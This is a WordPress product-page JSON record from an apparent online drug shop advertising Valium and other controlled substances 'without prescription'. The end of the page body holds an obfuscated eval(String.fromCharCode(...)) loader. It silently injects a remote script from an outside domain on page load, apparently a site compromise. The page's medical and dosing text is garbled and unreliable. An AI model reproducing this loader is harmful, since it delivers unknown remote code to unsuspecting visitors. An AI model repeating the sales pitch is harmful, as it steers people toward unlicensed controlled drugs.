{"id":3941,"date":"2025-02-06T21:28:28","date_gmt":"2025-02-06T21:28:28","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=3941"},"modified":"2026-04-10T18:31:31","modified_gmt":"2026-04-10T18:31:31","slug":"buy-valium-online","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/tr\/product\/buy-valium-online\/","title":{"rendered":"Buy Valium Online"},"content":{"rendered":"<h1 style=\"text-align: center\"><strong>Best Place To Buy Valium Online Without Prescription<\/strong><\/h1>\n<p style=\"text-align: center\">Buy valium online without prescription. This is a legit chemical store, in discreet supplies. Also, provide a safe overnight shipment of our products. Again, our services run 24\/7. Granting us, the access to help in any situation.<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-valium-online\/\">SHOP NOW!!!<\/a><\/p>\n<p style=\"text-align: center\">Valium is a medicine of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Benzodiazepine\">benzodiazepine<\/a> family, which produces a calm effect. Likewise, Valium is seen as a\u00a0 controlled substance, by the U.S DEA. Diazepam is the organic name for valium. Valium is used in the treatment of anxiety, with a wide range of conditions. In fact, it is however also for the treatment, of alcohol withdrawal syndromes. Valium treats benzodiazepine withdrawal syndrome, Also mentioning muscle spasms, and trouble to sleep.<\/p>\n<h2 style=\"text-align: center\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>\u00a0 \u00a0 How To Use Valium<\/strong><\/h2>\n<p style=\"text-align: center\">Firstly, valium is used mainly to treat anxiety. Also, insomnia. not forgetting panic attacks. And, symptoms of acute alcohol withdrawal. We also, advise you to follow instructions from a doctor. As well, contact us in the usage and prescription. Valium is known to be an oral medication. It should be taken through the mouth. Hence, it&#8217;s advisable to follow prescriptions from your doctor. This will avoid taking an overdose. Again, should in case of an increase in dosage, consult a doctor. To help with the dosage of valium. If any additional dosage, it should be for maximum beneficial consumption.<\/p>\n<h3 style=\"text-align: center\"><b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Side Effects<\/b><\/h3>\n<p style=\"text-align: center\">Valium has effects if used wrongly. There are several side effects, for using valium. IF you face any, we advise you to visit a medical consultant. Not to mention, valium may cause shakiness and unsteady walk. Also, blurred vision is likely to occur. Unsteadiness, trembling, or other problems with muscle control. To tell the truth, it also causes agitation and confusion. Shallow breathing, and also lack of memory. It loses track of what takes place, after a certain event. Valium also causes restlessness. In some situations, agitation also occurs.<\/p>\n<h4 style=\"text-align: center\"><strong>\u00a0Why Order From Us( Order Valium Online)<\/strong><\/h4>\n<p style=\"text-align: center\">To start, It is more advantageous to buy from us. The prices we offer, are lesser, and affordable. Those at <a href=\"http:\/\/duckduckgo.com\">pharmacies<\/a> and stores are demanding. This is because pharmacies do pay <a href=\"http:\/\/bing.com\">bills<\/a>. Such as rentals, utilities, and various taxes. These taxes do reflect on their prices. We, on the other hand, don\u2019t face such. We serve discreetly to any location.<\/p>\n<p>Best Pharmacy to Buy Valium Online, Best Pharmacy to Buy Valium Online<\/p>\n<h3 style=\"text-align: center\">Best Place To Buy Valium Online Without Prescription &#8211; Valium For Sale Here Safely and Legit<\/h3>\n<p style=\"text-align: center\">\n<p>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Best Place To Buy Valium Online Without Prescription Buy valium online without prescription. This is a legit chemical store, in discreet supplies. Also, provide a safe overnight shipment of our products. Again, our services run 24\/7. Granting us, the access to help in any situation. SHOP NOW!!! Valium is a medicine of the benzodiazepine family, [&hellip;]<\/p>\n","protected":false},"featured_media":3967,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[2523],"product_tag":[3404,3405,3406,3407,1447,3408,3409,3410,3411,3412,3413,2934,3414,2071,3415,3416,3417,3418,3419,3420,3421,3422,3423,3424,3425,3426,3427,3428,3429,3430,3431,3432,3433,3434,3435,3436,3437,3438,3439,3440,3441,3442,3053,2807,3443,3444,3445,3446,3447,3448,3449,3450,3451,3452],"class_list":{"0":"post-3941","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-depression-and-anxiety","7":"product_tag-best-pharmacy-to-buy-valium-online","8":"product_tag-best-place-to-buy-valium","9":"product_tag-best-place-to-buy-valium-online-without-prescription","10":"product_tag-best-valium-pharmacy-online","11":"product_tag-buy-adderall-online","12":"product_tag-buy-adipex-online","13":"product_tag-buy-desoxyn-online","14":"product_tag-buy-dexedrine-online","15":"product_tag-buy-dilaudid-online","16":"product_tag-buy-hydrocodone-online","17":"product_tag-buy-ketamax-injection-online","18":"product_tag-buy-morphine-online","19":"product_tag-buy-opana-online","20":"product_tag-buy-oxycontin-online","21":"product_tag-buy-subutex-online","22":"product_tag-buy-valium","23":"product_tag-buy-valium-canada","24":"product_tag-buy-valium-cheap","25":"product_tag-buy-valium-from-canada","26":"product_tag-buy-valium-from-india","27":"product_tag-buy-valium-from-mexico","28":"product_tag-buy-valium-injections","29":"product_tag-buy-valium-near-me","30":"product_tag-buy-valium-online","31":"product_tag-buy-valium-online-australia","32":"product_tag-buy-valium-online-canada","33":"product_tag-buy-valium-online-europe","34":"product_tag-buy-valium-online-from-india","35":"product_tag-buy-valium-online-in-australia","36":"product_tag-buy-valium-online-in-california","37":"product_tag-buy-valium-online-in-canada","38":"product_tag-buy-valium-online-in-europe","39":"product_tag-buy-valium-online-in-spain","40":"product_tag-buy-valium-online-in-uk","41":"product_tag-buy-valium-online-in-usa","42":"product_tag-buy-valium-online-india","43":"product_tag-buy-valium-online-mexico","44":"product_tag-buy-valium-online-uk","45":"product_tag-buy-valium-online-usa","46":"product_tag-buy-valium-online-without-prescription","47":"product_tag-buy-valium-pen","48":"product_tag-buy-valium-without-prescription","49":"product_tag-buy-vyvanse-online","50":"product_tag-buy-xanax-online","51":"product_tag-here-safely-and-legit","52":"product_tag-here-safely-and-legit-valium-for-sale","53":"product_tag-how-to-use-valium-how-to-use-valium","54":"product_tag-in-new-york","55":"product_tag-order-valium-online","56":"product_tag-order-valium-online-in-uk","57":"product_tag-valium","58":"product_tag-valium-for-sale","59":"product_tag-valium-side-effects","60":"product_tag-where-can-i-buy-valium-online","61":"desktop-align-left","62":"tablet-align-left","63":"mobile-align-left","65":"first","66":"instock","67":"shipping-taxable","68":"purchasable","69":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy Valium Online -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-valium-online\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy Valium Online -\" \/>\n<meta property=\"og:description\" content=\"Best Place To Buy Valium Online Without Prescription Buy valium online without prescription. This is a legit chemical store, in discreet supplies. Also, provide a safe overnight shipment of our products. Again, our services run 24\/7. Granting us, the access to help in any situation. SHOP NOW!!! Valium is a medicine of the benzodiazepine family, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-valium-online\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-10T18:31:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"280\" \/>\n\t<meta property=\"og:image:height\" content=\"280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/\",\"name\":\"Buy Valium Online -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/a-Copy-280x280-1.jpeg\",\"datePublished\":\"2025-02-06T21:28:28+00:00\",\"dateModified\":\"2026-04-10T18:31:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/a-Copy-280x280-1.jpeg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/a-Copy-280x280-1.jpeg\",\"width\":280,\"height\":280},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-valium-online\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy Valium Online\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buy Valium Online -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/tr\/product\/buy-valium-online\/","og_locale":"tr_TR","og_type":"article","og_title":"Buy Valium Online -","og_description":"Best Place To Buy Valium Online Without Prescription Buy valium online without prescription. This is a legit chemical store, in discreet supplies. Also, provide a safe overnight shipment of our products. Again, our services run 24\/7. Granting us, the access to help in any situation. SHOP NOW!!! Valium is a medicine of the benzodiazepine family, [&hellip;]","og_url":"https:\/\/exoticchemicals.com\/tr\/product\/buy-valium-online\/","article_modified_time":"2026-04-10T18:31:31+00:00","og_image":[{"width":280,"height":280,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"2 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/","url":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/","name":"Buy Valium Online -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg","datePublished":"2025-02-06T21:28:28+00:00","dateModified":"2026-04-10T18:31:31+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-valium-online\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg","width":280,"height":280},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-valium-online\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy Valium Online"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"egzoti\u0307k ki\u0307myasallar","description":"MDPHP Hidroklor\u00fcr Sat\u0131n Al\u0131n","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1-150x150.jpeg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",12,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1.jpeg",280,280,false],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/a-Copy-280x280-1-100x100.jpeg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/tr\/author\/"},"uagb_comment_info":2,"uagb_excerpt":"Best Place To Buy Valium Online Without Prescription Buy valium online without prescription. This is a legit chemical store, in discreet supplies. Also, provide a safe overnight shipment of our products. Again, our services run 24\/7. Granting us, the access to help in any situation. SHOP NOW!!! Valium is a medicine of the benzodiazepine family,&hellip;","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product\/3941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/comments?post=3941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media\/3967"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media?parent=3941"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_brand?post=3941"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_cat?post=3941"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_tag?post=3941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}